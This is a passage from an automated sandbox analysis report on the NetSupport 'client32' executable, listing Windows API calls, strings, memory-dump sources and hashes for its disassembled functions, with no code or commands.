                                                                                • SetLastError.KERNEL32(00000078), ref: 11134978
                                                                                • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11134994
                                                                                • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 111349BC
                                                                                • SetLastError.KERNEL32(00000078), ref: 111349D9
                                                                                • SetLastError.KERNEL32(00000078), ref: 111349E6
                                                                                • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 111349F8
                                                                                • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11134A0B
                                                                                • SetLastError.KERNEL32(00000078), ref: 11134A11
                                                                                • FreeLibrary.KERNEL32(?), ref: 11134B7B
                                                                                • FreeLibrary.KERNEL32(?), ref: 11134B88
                                                                                • FreeLibrary.KERNEL32(?), ref: 11134B92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                                • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                                • API String ID: 263027137-1001504656
                                                                                • Opcode ID: e9bc53f18f3aff5df15c67e08978246e2bd3215a060d2d5924f045e3fecf3fd3
                                                                                • Instruction ID: db8711c19b503e7e72fae74a2cc3466c9a493194fb08fa6cc11ddefe45185306
                                                                                • Opcode Fuzzy Hash: e9bc53f18f3aff5df15c67e08978246e2bd3215a060d2d5924f045e3fecf3fd3
                                                                                • Instruction Fuzzy Hash: 27B1AE78E402699FDB10CFE9CD80BADFBB5EB88319F104429E419E7648DB749884CB55
                                                                                Function 11145C70 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 175registryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetVersionExA.KERNEL32(111F1EF0,76968400), ref: 11145CA0
                                                                                • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                • _memset.LIBCMT ref: 11145CFD
                                                                                  • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,76968400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                • _strncpy.LIBCMT ref: 11145DCA
                                                                                  • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                                • RegCloseKey.KERNEL32(00000000), ref: 11145E66
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                • API String ID: 3299820421-2117887902
                                                                                • Opcode ID: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                                • Instruction ID: 72e9b589e9c81c7730d33f5d85faf9c496c6ad46d8e7039c924549f2bc0033ac
                                                                                • Opcode Fuzzy Hash: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                                • Instruction Fuzzy Hash: A4510871E0023BABDB21CF61CD41FDEF7B9AB01B0CF1040A9E91D66945E7B16A49CB91
                                                                                Function 11116880 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 111168D5
                                                                                • CoCreateInstance.OLE32(111C1AAC,00000000,00000001,111C1ABC,00000000,?,00000000,Client,silent,00000000,00000000,?,1104C49F), ref: 111168EF
                                                                                • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11116914
                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11116926
                                                                                • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11116939
                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11116945
                                                                                • CoUninitialize.COMBASE(00000000), ref: 111169E1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                • String ID: SHELL32.DLL$SHGetSettings
                                                                                • API String ID: 4195908086-2348320231
                                                                                • Opcode ID: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                                • Instruction ID: 86b6e15c13bd198e2be1b4906c6dc8e983a2f790f9ea6f3073e45f268e972f68
                                                                                • Opcode Fuzzy Hash: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                                • Instruction Fuzzy Hash: 81515175A00219AFDB00DFA5C9C0EAFFBB9EF48304F114969E915AB244E771A941CB61
                                                                                Function 11073680 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memset
                                                                                • String ID: NBCTL32.DLL$_License$serial_no
                                                                                • API String ID: 2102423945-35127696
                                                                                • Opcode ID: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
                                                                                • Instruction ID: b632ae2d06a9e035363f4f75e6ccaf6c516ded967162c2d69bbdd490d26a7599
                                                                                • Opcode Fuzzy Hash: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
                                                                                • Instruction Fuzzy Hash: A8B18075E04209ABE714CF98DC81FEEB7F5FF88304F158169E9499B285DB71A901CB90
                                                                                Function 11031780 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(1102EA50,?,00000000), ref: 110317A4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID: Client32$NSMWClass$NSMWClass
                                                                                • API String ID: 3192549508-611217420
                                                                                • Opcode ID: 0b0c06552eb5d8578d5f8a1ba1b3e93930f4d748b8e68e94dbd9e084aab78c4a
                                                                                • Instruction ID: 804cb5d527221f69a992b866d17bc63a828f9d1c02720c4f1a032ef46c9a5584
                                                                                • Opcode Fuzzy Hash: 0b0c06552eb5d8578d5f8a1ba1b3e93930f4d748b8e68e94dbd9e084aab78c4a
                                                                                • Instruction Fuzzy Hash: C1F04F7890222ADFC30ADF95C995A59B7F4BB8870CB108574D43547208EB3179048B99
                                                                                Function 1109ED30 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00F9F4D8,00F9F4D8,00F9F4D8,00F9F4D8,00F9F4D8,00F9F4D8,00F9F4D8,111EFB64,?,00000001,00000001), ref: 1109EDB0
                                                                                • EqualSid.ADVAPI32(?,00F9F4D8,?,00000001,00000001), ref: 1109EDC3
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InformationToken$AllocateEqualInitialize
                                                                                • String ID:
                                                                                • API String ID: 1878589025-0
                                                                                • Opcode ID: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
                                                                                • Instruction ID: f2a8bc8f74b1de347afb3cb87d534257ea472b44b3b43d4353705adbfce15ac3
                                                                                • Opcode Fuzzy Hash: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
                                                                                • Instruction Fuzzy Hash: DF213031B0122EABEB10DA98DD95BFEB7B8EB44704F014169E929DB180E671AD10D791
                                                                                Function 1109D860 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,1B702977,00080000,00000000,?), ref: 1109D88D
                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                                • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                • String ID:
                                                                                • API String ID: 2349140579-0
                                                                                • Opcode ID: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
                                                                                • Instruction ID: 81f12928af7d2c66371a758247fa27ee71cd04b85772abc6619dfc746b0a2552
                                                                                • Opcode Fuzzy Hash: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
                                                                                • Instruction Fuzzy Hash: 4F018CB2640218ABE710DFA4CD89BABF7BCEB04705F004429E91597280D7B06904CBB0
                                                                                Function 1109D8F0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109EC30,00000244,cant create events), ref: 1109D90C
                                                                                • CloseHandle.KERNEL32(?,00000000,1109EC30,00000244,cant create events), ref: 1109D915
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                • String ID:
                                                                                • API String ID: 81990902-0
                                                                                • Opcode ID: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
                                                                                • Instruction ID: 1087c1a68057020919897756081cb42e4a012b8ce4d03b8cf520615490e2fd10
                                                                                • Opcode Fuzzy Hash: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
                                                                                • Instruction Fuzzy Hash: 3CE08C30280214ABE338DE24AD90FA673EDAF05B04F11092DF8A6D2580CA60E8008B60
                                                                                Function 1102EBD0 Relevance: 252.2, APIs: 32, Strings: 111, Instructions: 1967windowthreadsleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • GetSystemMetrics.USER32(00002000), ref: 1102ED54
                                                                                • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EF15
                                                                                  • Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                                  • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                  • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
                                                                                  • Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
                                                                                  • Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EF4B
                                                                                • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102EF6D
                                                                                • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102F22F
                                                                                  • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F1C
                                                                                  • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F29
                                                                                  • Part of subcall function 11094F00: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F59
                                                                                • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EFCC
                                                                                • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EFD8
                                                                                • CloseHandle.KERNEL32(00000000), ref: 1102EFF0
                                                                                • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EFFD
                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102F019
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102ED86
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • IsJPIK.PCICHEK(?,?,?,View,Client,Bridge), ref: 1102F3ED
                                                                                • LoadIconA.USER32(11000000,000004C1), ref: 1102F521
                                                                                • LoadIconA.USER32(11000000,000004C2), ref: 1102F531
                                                                                • DestroyCursor.USER32(00000000), ref: 1102F557
                                                                                • DestroyCursor.USER32(00000000), ref: 1102F568
                                                                                  • Part of subcall function 11028360: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 110283A3
                                                                                  • Part of subcall function 11028360: GetUserNameA.ADVAPI32(?,?), ref: 110283BC
                                                                                  • Part of subcall function 11028360: RevertToSelf.ADVAPI32 ref: 110283DC
                                                                                  • Part of subcall function 11028360: CloseHandle.KERNEL32(00000000), ref: 110283E3
                                                                                • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1102FB05
                                                                                • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client), ref: 1102FB58
                                                                                • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 110300F2
                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1103012C
                                                                                • DispatchMessageA.USER32(?), ref: 11030136
                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 11030148
                                                                                • CloseHandle.KERNEL32(00000000,Function_000278D0,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 110303D4
                                                                                • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1103040C
                                                                                • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 11030413
                                                                                • SetWindowPos.USER32(00040310,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 11030449
